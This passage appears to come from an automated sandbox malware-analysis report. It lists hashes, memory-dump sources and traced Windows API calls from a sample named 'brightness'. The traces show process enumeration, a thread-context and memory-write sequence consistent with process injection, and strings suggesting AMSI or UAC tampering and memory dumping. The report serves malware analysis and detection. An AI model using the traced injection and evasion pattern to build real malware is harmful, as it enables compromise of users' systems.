                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: InitVariant
                • String ID:
                • API String ID: 1927566239-0
                • Opcode ID: c00634fcd89b859b25ba3f6243723591d5ce70c5fa2e64bfbbe1cc941984232c
                • Instruction ID: bc749b944508962126fff68a57c044f6036f76abdd63621f33a5c0b0e44a1fca
                • Opcode Fuzzy Hash: c00634fcd89b859b25ba3f6243723591d5ce70c5fa2e64bfbbe1cc941984232c
                • Instruction Fuzzy Hash: 9A31727DA04618AFDB94DFACD888AAA77E9FB0C304F444465EA09D3660D334D990CB66
                APIs
                • CLSIDFromProgID.OLE32(00000000,?,00000000,02906D39,?,?,?,00000000), ref: 02906D19
                  • Part of subcall function 028F4C0C: SysFreeString.OLEAUT32(0290ED84), ref: 028F4C1A
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: FreeFromProgString
                • String ID:
                • API String ID: 4225568880-0
                • Opcode ID: 7e9b0b7cab0341c67247273d7b63f0e66b25069323f0949395d9918c07fdab60
                • Instruction ID: 17593fd1e76bdd37c036128e8b35604d4665e70e5b969a2c7e592191875afdb9
                • Opcode Fuzzy Hash: 7e9b0b7cab0341c67247273d7b63f0e66b25069323f0949395d9918c07fdab60
                • Instruction Fuzzy Hash: 4DE0ED3E200308BFE300FBA9CC9295A77ADDF89B40B610472AB00D7280EB70AE108861
                APIs
                • GetModuleFileNameA.KERNEL32(028F0000,?,00000105), ref: 028F5832
                  • Part of subcall function 028F5A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,028F0000,0291E790), ref: 028F5A94
                  • Part of subcall function 028F5A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,028F0000,0291E790), ref: 028F5AB2
                  • Part of subcall function 028F5A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,028F0000,0291E790), ref: 028F5AD0
                  • Part of subcall function 028F5A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 028F5AEE
                  • Part of subcall function 028F5A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,028F5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 028F5B37
                  • Part of subcall function 028F5A78: RegQueryValueExA.ADVAPI32(?,028F5CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,028F5B7D,?,80000001), ref: 028F5B55
                  • Part of subcall function 028F5A78: RegCloseKey.ADVAPI32(?,028F5B84,00000000,?,?,00000000,028F5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 028F5B77
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: Open$FileModuleNameQueryValue$Close
                • String ID:
                • API String ID: 2796650324-0
                • Opcode ID: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                • Instruction ID: 340a530cf58aa57fd801f4b3f2a6eecccb980d0af7169f1846194dc7a8a5d4fc
                • Opcode Fuzzy Hash: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                • Instruction Fuzzy Hash: 40E06579A003148BCB90DE6CC8C0A8737D8AB08B50F8009A5EE58DF34AD3B4D9608BE1
                APIs
                • GetFileAttributesA.KERNEL32(00000000,?,0290FD00,ScanString,0295237C,0291B40C,OpenSession,0295237C,0291B40C,ScanString,0295237C,0291B40C,UacScan,0295237C,0291B40C,UacInitialize), ref: 028F7E1B
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: 81e72d02e34d49699fbcea4f3e8a1facf21165fd85f6b10d0c15ae5a9543b4f5
                • Instruction ID: 216511c283efffd7f1d9b1c80a00d1c3ec59a6fcea5954b61eb3e42d1a0ca0d2
                • Opcode Fuzzy Hash: 81e72d02e34d49699fbcea4f3e8a1facf21165fd85f6b10d0c15ae5a9543b4f5
                • Instruction Fuzzy Hash: 72C08CECB122020A2AD0A1FC0CC402A438809081397A42F33E73CEA2F2F32188236431
                APIs
                • SysFreeString.OLEAUT32(0290ED84), ref: 028F4C1A
                • SysReAllocStringLen.OLEAUT32(0291C2B4,0290ED84,000000B4), ref: 028F4C62
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: String$AllocFree
                • String ID:
                • API String ID: 344208780-0
                • Opcode ID: 34a044716cc047832c89a5cdbf8a1cf543af0314eed8eb6eb3cc9569b15b6366
                • Instruction ID: 005a6579f653dfd79f081eb0c929fbc8108243f3bdcb0a81a9458a74d7134c02
                • Opcode Fuzzy Hash: 34a044716cc047832c89a5cdbf8a1cf543af0314eed8eb6eb3cc9569b15b6366
                • Instruction Fuzzy Hash: 41D0127C5001059DBAEC999D4548937636A9ED030A348D25B9B0ECA241F7319401CA31
                APIs
                • timeSetEvent.WINMM(00002710,00000000,0291BF78,00000000,00000001), ref: 0291BF94
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: Eventtime
                • String ID:
                • API String ID: 2982266575-0
                • Opcode ID: d381a7bc9e3500fdd187a3efb950345ce86e92572f28bf3a2e16311699fc01f6
                • Instruction ID: 048502ea8f5209cc4aef339b217b6647cdf3fa9c32f3f6b93dc0251bc7259723
                • Opcode Fuzzy Hash: d381a7bc9e3500fdd187a3efb950345ce86e92572f28bf3a2e16311699fc01f6
                • Instruction Fuzzy Hash: 33C048E97843487AFA10A6AA1CD2F2722CED344B01F200462BA00EA2C1D5E299508A20
                APIs
                • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,028F1A03,?,028F1FC1), ref: 028F15E2
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                • Opcode ID: 5400a1cc6f6bd84811f27c6d404dd62a1aa0986242a82d732127efbc98beb753
                • Instruction ID: 026e09ad2915ec2f05f1212adb84f875b918ad2661c9576f2cb86bacec885caa
                • Opcode Fuzzy Hash: 5400a1cc6f6bd84811f27c6d404dd62a1aa0986242a82d732127efbc98beb753
                • Instruction Fuzzy Hash: 50F06DF9B463018FDF45CF799944B117BD2EB89348F108579D609DB788E77984018B00
                APIs
                • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,028F1FC1), ref: 028F16A4
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                • Opcode ID: ef50659aed354739781be7b81d9a57462b4b57082b63211b2a5495cef4556b24
                • Instruction ID: f336e38f360b221a99379d2cd0e1182a70b1b56f4cd1117e377d46f9052322e0
                • Opcode Fuzzy Hash: ef50659aed354739781be7b81d9a57462b4b57082b63211b2a5495cef4556b24
                • Instruction Fuzzy Hash: 4BF09ABAB447A5ABD7109E5E9C84B92BBA4FB10365F050239EA0C9B340D770A8108B94
                APIs
                • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,028F1FE4), ref: 028F1704
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: FreeVirtual
                • String ID:
                • API String ID: 1263568516-0
                • Opcode ID: faa1606d3bcc20e8039100c9275795a114f871060205075b1a8040647cf81cbc
                • Instruction ID: 0703de7cdc2a35008232ae8abb25db11180abe141a5df69adf3e6629bfdac689
                • Opcode Fuzzy Hash: faa1606d3bcc20e8039100c9275795a114f871060205075b1a8040647cf81cbc
                • Instruction Fuzzy Hash: 9FE0867D300311EFD7505A7D5D88712ABD8EB54654F144475F70DDB245D360E8108B60
                APIs
                • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0290ABDB,?,?,0290AC6D,00000000,0290AD49), ref: 0290A968
                • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0290A980
                • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0290A992
                • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 0290A9A4
                • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0290A9B6
                • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 0290A9C8
                • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0290A9DA
                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0290A9EC
                • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0290A9FE
                • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 0290AA10
                • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0290AA22
                • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 0290AA34
                • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0290AA46
                • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0290AA58
                • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0290AA6A
                • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0290AA7C
                • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0290AA8E
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: AddressProc$HandleModule
                • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                • API String ID: 667068680-597814768
                • Opcode ID: a773b4587a8e6c0d50655c224535d3f1a132b43102759b064fbe18add50c8832
                • Instruction ID: f0bc69a1b2d9c776555c134d3d32aff204098099dd8c2e256762946d167e25a9
                • Opcode Fuzzy Hash: a773b4587a8e6c0d50655c224535d3f1a132b43102759b064fbe18add50c8832
                • Instruction Fuzzy Hash: 1E31C0B4E843349FEB41AFB9D8E5A2637AEAB457007000A65AA11CF2C5E77894118FD2
                APIs
                  • Part of subcall function 0290881C: LoadLibraryA.KERNEL32(00000000,00000000,02908903), ref: 02908850
                  • Part of subcall function 0290881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02908903), ref: 02908860
                  • Part of subcall function 0290881C: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 02908879
                  • Part of subcall function 0290881C: FreeLibrary.KERNEL32(74AE0000,00000000,02952388,Function_000065D8,00000004,02952398,02952388,000186A3,00000040,0295239C,74AE0000,00000000,00000000,00000000,00000000,02908903), ref: 029088E3
                • GetThreadContext.KERNEL32(00000000,02952420,ScanString,029523A4,0290A774,UacInitialize,029523A4,0290A774,ScanBuffer,029523A4,0290A774,ScanBuffer,029523A4,0290A774,UacInitialize,029523A4), ref: 0290943A
                  • Part of subcall function 02907CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02907D6C
                • SetThreadContext.KERNEL32(00000000,02952420,ScanBuffer,029523A4,0290A774,ScanString,029523A4,0290A774,Initialize,029523A4,0290A774,00000000,-00000008,029524F8,00000004,029524FC), ref: 0290A14F
                • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,02952420,ScanBuffer,029523A4,0290A774,ScanString,029523A4,0290A774,Initialize,029523A4,0290A774,00000000,-00000008,029524F8), ref: 0290A15C
                  • Part of subcall function 02908798: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,029523A4,0290A3BF,ScanString,029523A4,0290A774,ScanBuffer,029523A4,0290A774,Initialize,029523A4,0290A774,UacScan), ref: 029087AC
                  • Part of subcall function 02908798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029087C6
                  • Part of subcall function 02908798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,029523A4,0290A3BF,ScanString,029523A4,0290A774,ScanBuffer,029523A4,0290A774,Initialize), ref: 02908802
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: Library$Thread$AddressContextFreeLoadProc$HandleMemoryModuleResumeVirtualWrite
                • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                • API String ID: 4175202198-51457883
                • Opcode ID: 5c1fef7e82d1818c89407fbbc67991f8e77558db3d76e683a6b114d0502e12d1
                • Instruction ID: 0c527dc67a0a2eb583a540696c75c6bd16c7ce98b5d799cc6e13e67cf6980886
                • Opcode Fuzzy Hash: 5c1fef7e82d1818c89407fbbc67991f8e77558db3d76e683a6b114d0502e12d1
                • Instruction Fuzzy Hash: BAE2F039B5021C9FDB51EB68CCD0ADF73FAAF85300F1081A29705E7265DA34AE858F56
                APIs
                  • Part of subcall function 0290881C: LoadLibraryA.KERNEL32(00000000,00000000,02908903), ref: 02908850
                  • Part of subcall function 0290881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02908903), ref: 02908860
                  • Part of subcall function 0290881C: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 02908879
                  • Part of subcall function 0290881C: FreeLibrary.KERNEL32(74AE0000,00000000,02952388,Function_000065D8,00000004,02952398,02952388,000186A3,00000040,0295239C,74AE0000,00000000,00000000,00000000,00000000,02908903), ref: 029088E3
                • GetThreadContext.KERNEL32(00000000,02952420,ScanString,029523A4,0290A774,UacInitialize,029523A4,0290A774,ScanBuffer,029523A4,0290A774,ScanBuffer,029523A4,0290A774,UacInitialize,029523A4), ref: 0290943A
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: Library$AddressContextFreeHandleLoadModuleProcThread
                • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                • API String ID: 1116111917-51457883
                • Opcode ID: 883b28f1fb3248feb3990cf87c39a669d701722945a3fe66890becc23f8e12e3
                • Instruction ID: 5ed40184e716501653faad550fcb3a9d6c7aa2367fecb3415e20a96b3b947820
                • Opcode Fuzzy Hash: 883b28f1fb3248feb3990cf87c39a669d701722945a3fe66890becc23f8e12e3
                • Instruction Fuzzy Hash: 20E2F039B5021C9FDB51EB68CCD0ADF73FAAF85300F1081A29705E7265DA34AE858F56
                APIs
                • GetModuleHandleA.KERNEL32(kernel32.dll,028F6BC8,028F0000,0291E790), ref: 028F58D1
                • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 028F58E8
                • lstrcpynA.KERNEL32(?,?,?), ref: 028F5918
                • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,028F6BC8,028F0000,0291E790), ref: 028F597C
                • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,028F6BC8,028F0000,0291E790), ref: 028F59B2
                • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,028F6BC8,028F0000,0291E790), ref: 028F59C5
                • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,028F6BC8,028F0000,0291E790), ref: 028F59D7
                • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,028F6BC8,028F0000,0291E790), ref: 028F59E3
                • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,028F6BC8,028F0000), ref: 028F5A17
                • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,028F6BC8), ref: 028F5A23
                • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 028F5A45
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                • String ID: GetLongPathNameA$\$kernel32.dll
                • API String ID: 3245196872-1565342463
                • Opcode ID: 4f7b32f1560b7be0459198089f66e728366562fb6816279482b18ae9e2745fde
                • Instruction ID: 38aab01fd1c1f0d028f504e51116972167c3593b3228b816515407e2c0ef4397
                • Opcode Fuzzy Hash: 4f7b32f1560b7be0459198089f66e728366562fb6816279482b18ae9e2745fde
                • Instruction Fuzzy Hash: 14416D79E00659EFDB50DBE8CC88ADEB3BEAB08300F5445A5A648E7241E7349A548F60
                APIs
                • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 028F5B94
                • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 028F5BA1
                • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 028F5BA7
                • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 028F5BD2
                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 028F5C19
                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 028F5C29
                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 028F5C51
                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 028F5C61
                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 028F5C87
                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 028F5C97
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                • API String ID: 1599918012-2375825460
                • Opcode ID: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                • Instruction ID: 87274868c3c361739a8a37b654f07a6177889ee2f942c40ec36dd97383685f3b
                • Opcode Fuzzy Hash: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                • Instruction Fuzzy Hash: 7731A47DE4021CAAFB65D6F88C89FDFBBAD4B04380F4401E19708E6181DB789E848F91
                APIs
                • LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,029523A4,0290A3BF,ScanString,029523A4,0290A774,ScanBuffer,029523A4,0290A774,Initialize,029523A4,0290A774,UacScan), ref: 029087AC
                • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029087C6
                • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,029523A4,0290A3BF,ScanString,029523A4,0290A774,ScanBuffer,029523A4,0290A774,Initialize), ref: 02908802
